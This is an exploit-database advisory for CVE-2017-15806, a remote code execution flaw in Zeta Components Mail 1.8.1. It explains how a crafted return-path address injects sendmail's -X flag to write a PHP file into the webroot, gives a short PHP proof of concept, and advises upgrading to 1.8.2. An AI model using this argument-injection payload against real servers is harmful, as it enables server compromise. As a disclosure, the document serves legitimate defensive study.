Lucene search
MalwareBenchmark1337DAY-ID-29009HistoryNov 16, 2017 - 12:00 a.m.
Zeta Components Mail 1.8.1 - Remote Code Execution Vulnerability
2017-11-1600:00:00
MalwareBenchmark
0day.today
36
EPSS
0.146
Percentile
95.8%
Exploit for php platform in category web applications
Vendor: Zeta Components
module: Mail, <= 1.8.1
Published: November 12nd, 2017
Reported by: Kay
CVE-2017-15806
Overview
Zeta Components are a high quality, general purpose library of loosly coupled components for development of applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It’s possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.
Detail
This vulnerability is on send method in ezcMailMtaTransport class.
In /src/transports/mta/mta_transport.php at line 73, send() method use PHP mail() method to deliver email, while PHP use sendmail as default MTA. When mail() method is called, the 5th parameter is $additionalParameters , this parameter can pass extra param to sendmail. As the code shown, it is assigned by this line:
$additionalParameters = "-f{$mail->returnPath->email}”;
If attacker assign email address like:
'[email protected] -X/var/www/html/cache/exploit.php'
and inject payload in mail body, sendmail will transfer log(-X) into /var/www/html/cache/exploit.php. The resulting file will contain the payload passed in the body of the email, that can then be accessed and run through domainname/cache/exploit.php.
To summary, it is possible if all of these conditions are true:
- you use the ezcMailMtaTransport
- your “sendmail” binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don’t support that argument
- your wwwroot is writable by the user your webserver is running at the input to use for the ezcMailAddress that is assigned to the returnPath property is not properly escaped
PoC
use Mail\mail;
$mail = new ezcMail();
$mail->returnPath = new ezcMailAddress('[email protected] -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);
Remediation
Upgrade Mail to 1.8.2
# 0day.today [2018-01-09] #Related
github
github
Zeta Components Mail Arbitrary code execution via a crafted email address
2022-05-17 00:18:44
exploitdb
exploitdb
Zeta Components Mail 1.8.1 - Remote Code Execution
2017-11-16 00:00:00
prion
prion
Code injection
2017-11-15 16:29:00
friendsofphp
friendsofphp
Arbitrary code execution via a crafted email address
2017-11-01 19:02:00
Arbitrary code execution via a crafted email address
2017-11-01 19:02:00
veracode
veracode
Remote Code Execution (RCE)
2017-11-16 10:34:26
osv
osv
Zeta Components Mail Arbitrary code execution via a crafted email address
2022-05-17 00:18:44
CVE-2017-15806
2017-11-15 16:29:00
cve
cve
CVE-2017-15806
2017-11-15 16:29:00
exploitpack
exploitpack
Zeta Components Mail 1.8.1 - Remote Code Execution
2017-11-16 00:00:00
cvelist
cvelist
CVE-2017-15806
2017-11-15 16:00:00
nvd
nvd
CVE-2017-15806
2017-11-15 16:29:00